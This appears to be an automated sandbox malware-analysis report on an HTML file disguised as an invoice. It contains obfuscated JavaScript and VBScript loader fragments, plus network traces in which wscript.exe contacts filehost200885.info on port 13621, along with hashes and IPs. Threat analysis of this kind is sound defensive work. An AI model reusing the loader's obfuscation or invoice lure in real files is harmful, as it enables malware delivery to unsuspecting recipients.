                                                                                    Preview:PK........iPjZ.+.k.6...6......2025020665304.vbswDBRdQvkDPBpkpilJJks = Split("FobLLkfrsr EacbLLkfrsh veMetxuqAFPYyiNziuUbWN IbLLkfrsn SpbLLkfrslit(""-362/bLLkfrs2I-450/bLLkfrs3I-561+333I-213+22I29-175I-122-24I136-285I-489+343I-402+174I132-310I202-361I-226+81I-429/bLLkfrs3I-346+195I89-248I-912/bLLkfrs4I-637+455I-636/4I-420/3I-81-63I-912/4I-606/3I136-364I271-499I-609+381I-531/3I-636/4I-206+62I-193-35I-155+9I202-361I-614+467I-329+148I310-472I-308/2I-703+475I100-299I-170-58I269-462I-523+377I-318/2I-441+278I-202+58I-636/4I-724/4I-66-96I-357+203I-122-37I-483/3I257-401I16-236I-461+235I-604/4I-157+12I-480+340I-604/4I-608/4I130-340I-856/4I-230+90I311-462I-259+107I-609+453I-576/4I-379+235I-197+49I205-431I-475+256I-382+154I-469+267I-317+89I-352+124I-415+187I-207+14I-480+317I-406+254I-397+245I-227-1I-202+56I337-496I-135-12I-724/4I223-385I-308/2I-642/3I-253+72I-256+108I-477/3I-450/3I-440/2I-32-194I161-350I-419+260I-342+198I-678/3I-648/3I33-261I-904/4I-30-126I-193+49I-200+56I-420+272I-134-11I-606/3I-
                                                                                    File type:HTML document, ASCII text, with very long lines (65438), with CRLF line terminators
                                                                                    Entropy (8bit):3.558116858508579
                                                                                    TrID:
                                                                                    • HyperText Markup Language (15015/1) 30.02%
                                                                                    • HyperText Markup Language (12001/1) 23.99%
                                                                                    • HyperText Markup Language (12001/1) 23.99%
                                                                                    • HyperText Markup Language (11001/1) 21.99%
                                                                                    File name:faktura_FV2025020660849.html
                                                                                    File size:94'206 bytes
                                                                                    MD5:467b6110a70e52f3bee6a6331cd809bd
                                                                                    SHA1:9588dfe44777f409bc74eb61f452c8e8b8feae92
                                                                                    SHA256:a4a49cc9e4542c0b845354a26f3ef4bf69065c120101d8179f512bf7507309d6
                                                                                    SHA512:e3ac711d56e9a2f38da25ce32947ca6270621680a453e863d381a927c4df7dbf425584a1db0d35ce22b41f5b84668edfa080475c6c552fd3413ae4428515d9da
                                                                                    SSDEEP:1536:LRBaCtsj70ygPGQKXplLbjG7DXYl1rrwrgBj/6EK:d
                                                                                    TLSH:B693ECD13A846AC9E148A21E37AD8F8B397963EF601D72051F3C7BC5BB806A65D30F45
                                                                                    File Content Preview:<!DOCTYPE html>..<html>.. <head>.. <meta charset="utf-8">.. </head>.. <body>.. <script>.. var mwSHbJsIaA = "ezSZRyEval(\"oUUqzQoHXWZfqwUoNRzwwKGOk = ''; \" + StrinzSZRyEg.fromCzSZRyEharCode.applzSZRyEy(null, \"78+24H139-22H88+22H75+24H97+19H


                                                                                    • Total Packets: 121
                                                                                    • 13621 undefined
                                                                                    • 443 (HTTPS)
                                                                                    • 80 (HTTP)
                                                                                    • 53 (DNS)
                                                                                    Mar 13, 2025 14:56:55.357665062 CET44349692149.56.240.132192.168.2.7
                                                                                    Mar 13, 2025 14:56:55.357733965 CET44349692149.56.240.132192.168.2.7
                                                                                    Mar 13, 2025 14:56:55.357796907 CET49692443192.168.2.7149.56.240.132
                                                                                    Mar 13, 2025 14:56:55.363085032 CET49692443192.168.2.7149.56.240.132
                                                                                    Mar 13, 2025 14:56:55.363106012 CET44349692149.56.240.132192.168.2.7
                                                                                    Mar 13, 2025 14:56:55.741283894 CET49675443192.168.2.72.23.227.208
                                                                                    Mar 13, 2025 14:56:55.741303921 CET49674443192.168.2.72.23.227.208
                                                                                    Mar 13, 2025 14:56:55.756315947 CET49673443192.168.2.72.23.227.208
                                                                                    Mar 13, 2025 14:57:00.046794891 CET1362149694156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:00.046816111 CET1362149694156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:00.046942949 CET4969413621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:00.058410883 CET4969413621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:00.058614016 CET4969413621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:00.063060045 CET1362149694156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:00.063199997 CET4969413621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:02.976844072 CET44349690172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:02.976947069 CET44349690172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:02.976990938 CET49690443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:57:03.068779945 CET49690443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:57:03.068830967 CET44349690172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:07.512058973 CET49672443192.168.2.72.23.227.208
                                                                                    Mar 13, 2025 14:57:07.512124062 CET443496722.23.227.208192.168.2.7
                                                                                    Mar 13, 2025 14:57:14.955980062 CET1362149693156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:14.956110954 CET1362149693156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:14.956159115 CET4969313621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:15.798604012 CET4969313621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:15.803359985 CET1362149693156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:20.482661009 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:20.482719898 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:20.486814976 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:20.555078030 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:20.555121899 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:21.428466082 CET49671443192.168.2.7204.79.197.203
                                                                                    Mar 13, 2025 14:57:21.756283998 CET49671443192.168.2.7204.79.197.203
                                                                                    Mar 13, 2025 14:57:22.269871950 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:22.269944906 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.335021973 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.335066080 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:22.335457087 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:22.335536003 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.347333908 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.365675926 CET49671443192.168.2.7204.79.197.203
                                                                                    Mar 13, 2025 14:57:22.392330885 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:22.720869064 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:22.720942974 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.720980883 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:22.721035004 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.748059034 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:22.748117924 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.748133898 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:22.748176098 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.748209000 CET49705443192.168.2.754.39.128.117
                                                                                    Mar 13, 2025 14:57:22.748231888 CET4434970554.39.128.117192.168.2.7
                                                                                    Mar 13, 2025 14:57:23.568780899 CET49671443192.168.2.7204.79.197.203
                                                                                    Mar 13, 2025 14:57:24.094713926 CET4970613621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:24.099490881 CET1362149706156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:24.099783897 CET4970613621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:24.129601002 CET4970613621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:24.134391069 CET1362149706156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:24.781061888 CET1362149706156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:24.781085014 CET1362149706156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:24.781171083 CET4970613621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:25.004643917 CET4970613621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:25.009416103 CET1362149706156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:25.193599939 CET1362149706156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:25.206059933 CET4970613621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:57:25.210773945 CET1362149706156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:57:25.974215984 CET49671443192.168.2.7204.79.197.203
                                                                                    Mar 13, 2025 14:57:30.004703999 CET49678443192.168.2.720.189.173.15
                                                                                    Mar 13, 2025 14:57:30.334661007 CET49678443192.168.2.720.189.173.15
                                                                                    Mar 13, 2025 14:57:30.774713993 CET49671443192.168.2.7204.79.197.203
                                                                                    Mar 13, 2025 14:57:30.944518089 CET49678443192.168.2.720.189.173.15
                                                                                    Mar 13, 2025 14:57:32.147649050 CET49678443192.168.2.720.189.173.15
                                                                                    Mar 13, 2025 14:57:34.553977013 CET49678443192.168.2.720.189.173.15
                                                                                    Mar 13, 2025 14:57:39.371356964 CET49678443192.168.2.720.189.173.15
                                                                                    Mar 13, 2025 14:57:40.380876064 CET49671443192.168.2.7204.79.197.203
                                                                                    Mar 13, 2025 14:57:48.974469900 CET49678443192.168.2.720.189.173.15
                                                                                    Mar 13, 2025 14:57:51.615888119 CET49716443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:57:51.615941048 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:51.616018057 CET49716443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:57:51.616383076 CET49716443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:57:51.616398096 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:53.274779081 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:53.275119066 CET49716443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:57:53.275132895 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:53.275460958 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:53.275747061 CET49716443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:57:53.275804996 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:57:53.317903042 CET49716443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:58:02.858833075 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:02.858906984 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:02.859045029 CET49716443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:58:03.991352081 CET49716443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:58:03.991374969 CET44349716172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:51.678730965 CET49725443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:58:51.678772926 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:51.678849936 CET49725443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:58:51.679513931 CET49725443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:58:51.679526091 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:53.394726038 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:53.395143986 CET49725443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:58:53.395212889 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:53.395601034 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:53.396017075 CET49725443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:58:53.396104097 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:58:53.442554951 CET49725443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:59:03.042716026 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:59:03.042798042 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:59:03.044147015 CET49725443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:59:03.994360924 CET49725443192.168.2.7172.217.18.4
                                                                                    Mar 13, 2025 14:59:03.994440079 CET44349725172.217.18.4192.168.2.7
                                                                                    Mar 13, 2025 14:59:04.050467014 CET4970613621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:59:04.056227922 CET1362149706156.229.228.198192.168.2.7
                                                                                    Mar 13, 2025 14:59:04.056282043 CET4970613621192.168.2.7156.229.228.198
                                                                                    Mar 13, 2025 14:59:09.185122967 CET5048253192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:59:09.189816952 CET53504821.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:59:09.189948082 CET5048253192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:59:09.190085888 CET5048253192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:59:09.194749117 CET53504821.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:59:09.634428024 CET53504821.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:59:09.635759115 CET5048253192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:59:09.640615940 CET53504821.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:59:09.640687943 CET5048253192.168.2.71.1.1.1
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Mar 13, 2025 14:56:47.223436117 CET           53      55490  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:47.224668980 CET           53      52343  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:50.139547110 CET           53      62237  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:50.431256056 CET           53      51478  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:51.554388046 CET        57354         53  192.168.2.7    1.1.1.1
Mar 13, 2025 14:56:51.554629087 CET        51715         53  192.168.2.7    1.1.1.1
Mar 13, 2025 14:56:51.561223984 CET           53      51715  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:51.561249018 CET           53      57354  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:52.931272030 CET        64155         53  192.168.2.7    1.1.1.1
Mar 13, 2025 14:56:52.931552887 CET        64317         53  192.168.2.7    1.1.1.1
Mar 13, 2025 14:56:52.938672066 CET           53      64155  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:52.939366102 CET           53      64317  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:54.080761909 CET        64096         53  192.168.2.7    1.1.1.1
Mar 13, 2025 14:56:54.080960035 CET        51160         53  192.168.2.7    1.1.1.1
Mar 13, 2025 14:56:54.090686083 CET           53      64096  1.1.1.1        192.168.2.7
Mar 13, 2025 14:56:54.110677958 CET           53      51160  1.1.1.1        192.168.2.7
Mar 13, 2025 14:57:08.011280060 CET           53      64278  1.1.1.1        192.168.2.7
Mar 13, 2025 14:57:20.464127064 CET        54087         53  192.168.2.7    1.1.1.1
Mar 13, 2025 14:57:20.471023083 CET           53      54087  1.1.1.1        192.168.2.7
Mar 13, 2025 14:57:24.047461987 CET        55572         53  192.168.2.7    1.1.1.1
Mar 13, 2025 14:57:24.087903023 CET           53      55572  1.1.1.1        192.168.2.7
Mar 13, 2025 14:57:26.732479095 CET           53      51429  1.1.1.1        192.168.2.7
Mar 13, 2025 14:57:46.766768932 CET           53      65500  1.1.1.1        192.168.2.7
Mar 13, 2025 14:57:49.529953957 CET           53      58311  1.1.1.1        192.168.2.7
Mar 13, 2025 14:57:51.548337936 CET           53      57953  1.1.1.1        192.168.2.7
Mar 13, 2025 14:58:19.456320047 CET           53      51199  1.1.1.1        192.168.2.7
Mar 13, 2025 14:58:26.733803988 CET          138        138  192.168.2.7    192.168.2.255
Mar 13, 2025 14:59:05.139033079 CET           53      64258  1.1.1.1        192.168.2.7
Mar 13, 2025 14:59:09.184607029 CET           53      63130  1.1.1.1        192.168.2.7
Timestamp                            Source IP    Dest IP  Checksum  Code                Type
Mar 13, 2025 14:56:54.110764980 CET  192.168.2.7  1.1.1.1  c237      (Port unreachable)  Destination Unreachable
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                               Type            Class        DNS over HTTPS
Mar 13, 2025 14:56:51.554388046 CET  192.168.2.7  1.1.1.1  0x29ab    Standard query (0)  www.google.com                     A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:51.554629087 CET  192.168.2.7  1.1.1.1  0xbbae    Standard query (0)  www.google.com                     65              IN (0x0001)  false
Mar 13, 2025 14:56:52.931272030 CET  192.168.2.7  1.1.1.1  0xa95b    Standard query (0)  s4.histats.com                     A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.931552887 CET  192.168.2.7  1.1.1.1  0xa12e    Standard query (0)  s4.histats.com                     65              IN (0x0001)  false
Mar 13, 2025 14:56:54.080761909 CET  192.168.2.7  1.1.1.1  0x7bbf    Standard query (0)  filehost200885.info                A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:54.080960035 CET  192.168.2.7  1.1.1.1  0xcd45    Standard query (0)  _13621._https.filehost200885.info  65              IN (0x0001)  false
Mar 13, 2025 14:57:20.464127064 CET  192.168.2.7  1.1.1.1  0xe594    Standard query (0)  s4.histats.com                     A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:24.047461987 CET  192.168.2.7  1.1.1.1  0x96d2    Standard query (0)  filehost200885.info                A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                               CName  Address          Type            Class        DNS over HTTPS
Mar 13, 2025 14:56:51.561223984 CET  1.1.1.1    192.168.2.7  0xbbae    No error (0)    www.google.com                     -      -                65              IN (0x0001)  false
Mar 13, 2025 14:56:51.561249018 CET  1.1.1.1    192.168.2.7  0x29ab    No error (0)    www.google.com                     -      172.217.18.4     A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      149.56.240.132   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      54.39.128.162    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      142.4.219.198    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      149.56.240.31    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      54.39.156.32     A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      149.56.240.128   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      149.56.240.129   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      149.56.240.127   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      149.56.240.131   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      149.56.240.27    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      149.56.240.130   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      158.69.254.144   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:52.938672066 CET  1.1.1.1    192.168.2.7  0xa95b    No error (0)    s4.histats.com                     -      54.39.128.117    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:54.090686083 CET  1.1.1.1    192.168.2.7  0x7bbf    No error (0)    filehost200885.info                -      156.229.228.198  A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:56:54.110677958 CET  1.1.1.1    192.168.2.7  0xcd45    Name error (3)  _13621._https.filehost200885.info  none   none             65              IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      54.39.128.117    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      54.39.156.32     A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      149.56.240.128   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      158.69.254.144   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      149.56.240.132   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      149.56.240.127   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      149.56.240.130   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      54.39.128.162    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      149.56.240.131   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      142.4.219.198    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      149.56.240.31    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      149.56.240.129   A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:20.471023083 CET  1.1.1.1    192.168.2.7  0xe594    No error (0)    s4.histats.com                     -      149.56.240.27    A (IP address)  IN (0x0001)  false
Mar 13, 2025 14:57:24.087903023 CET  1.1.1.1    192.168.2.7  0x96d2    No error (0)    filehost200885.info                -      156.229.228.198  A (IP address)  IN (0x0001)  false
• s4.histats.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49692 | 149.56.240.132 | 443 | 5756 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:56:54 UTC | 795 | OUT | GET /stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
    Host: s4.histats.com
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Sec-Fetch-Storage-Access: active
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
2025-03-13 13:56:55 UTC | 135 | IN | HTTP/1.1 200 OK
    Date: Thu, 13 Mar 2025 13:56:53 GMT
    Content-Type: text/html;charset=UTF-8
    Content-Length: 376
    Connection: close
2025-03-13 13:56:55 UTC | 376 | IN | Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
    Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49705 | 54.39.128.117 | 443 | 6860 | C:\Windows\SysWOW64\wscript.exe

Timestamp | Bytes transferred | Direction | Data
2025-03-13 13:57:22 UTC | 365 | OUT | GET /stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
    Accept: */*
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: s4.histats.com
    Connection: Keep-Alive
2025-03-13 13:57:22 UTC | 135 | IN | HTTP/1.1 200 OK
    Date: Thu, 13 Mar 2025 13:57:06 GMT
    Content-Type: text/html;charset=UTF-8
    Content-Length: 376
    Connection: close
2025-03-13 13:57:22 UTC | 376 | IN | Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
    Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


Target ID: 0
Start time: 09:56:44
Start date: 13/03/2025
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase: 0x7ff778810000
File size: 3'388'000 bytes
MD5 hash: E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 1
Start time: 09:56:45
Start date: 13/03/2025
